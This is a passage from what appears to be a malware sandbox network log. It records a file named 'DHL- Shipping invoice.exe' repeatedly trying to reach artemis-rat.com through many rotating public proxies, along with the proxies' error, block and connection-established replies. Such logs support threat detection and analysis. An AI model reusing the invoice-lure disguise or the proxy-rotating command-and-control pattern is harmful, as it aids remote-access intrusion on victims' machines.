                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            435192.168.2.45141698.162.25.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.623051882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            436192.168.2.451508199.229.254.12941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.623694897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            437192.168.2.4515858.219.152.2224436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.626400948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            438192.168.2.45150568.1.210.16341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.630486012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            439192.168.2.4514915.255.97.208806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.631761074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.797950029 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            440192.168.2.451451167.71.5.8331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.632457018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.395711899 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            441192.168.2.45150972.217.158.20241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.632561922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            442192.168.2.451517198.74.51.7988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.632870913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            443192.168.2.45150623.137.248.197806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.634026051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            444192.168.2.45151372.206.181.12341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.634577990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            445192.168.2.451529104.21.80.83806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.636156082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.723695040 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            446192.168.2.45151246.35.9.110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.638689041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            447192.168.2.451545104.25.58.39806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.641278982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.729178905 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            448192.168.2.451515147.75.34.86100036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.644944906 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:00.812608004 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            449192.168.2.45090688.79.243.10331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.658302069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.834465027 CET1254INHTTP/1.1 403 Forbidden
                            Server: squid/3.5.28
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 952
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Content-Language: en
                            X-Cache: MISS from ah_test
                            Via: 1.1 ah_test (squid/3.5.28)
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 54 75 65 2c 20 31 32 20 4d 61 72 20 32 30 32 34 20 30 37 3a 33 37 3a 30 30 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Tue, 12 Mar 2024 07:37:00 GMT</p></div></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            450192.168.2.451419195.98.74.5710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.661180973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            451192.168.2.45049061.110.5.2806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.677679062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.269109964 CET114INHTTP/1.1 503 Service Temporarily Unavailable
                            Content-Type: text/html
                            Connection: close
                            Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 00
                            Data Ascii: Backend not available


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            452192.168.2.451522185.38.111.180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.677985907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.865452051 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:01.052994967 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            453192.168.2.451533158.51.210.7577776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.678436995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            454192.168.2.451563104.19.83.128806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.678652048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.767199993 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            455192.168.2.451473213.14.32.6741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.678672075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            456192.168.2.45163543.153.11.1024436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.681822062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            457192.168.2.451374117.160.250.131806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.685435057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.138675928 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            458192.168.2.451465190.114.253.21033896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.700870037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            459192.168.2.451395147.75.92.25194016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.716661930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.986454010 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            460192.168.2.450612128.199.221.91333836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.717986107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.749927998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750539064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843924999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.953162909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.971709013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.140408993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.144938946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:01.264228106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            461192.168.2.451544185.217.136.6713376484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.718343973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.886116028 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            462192.168.2.45147638.54.79.150806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
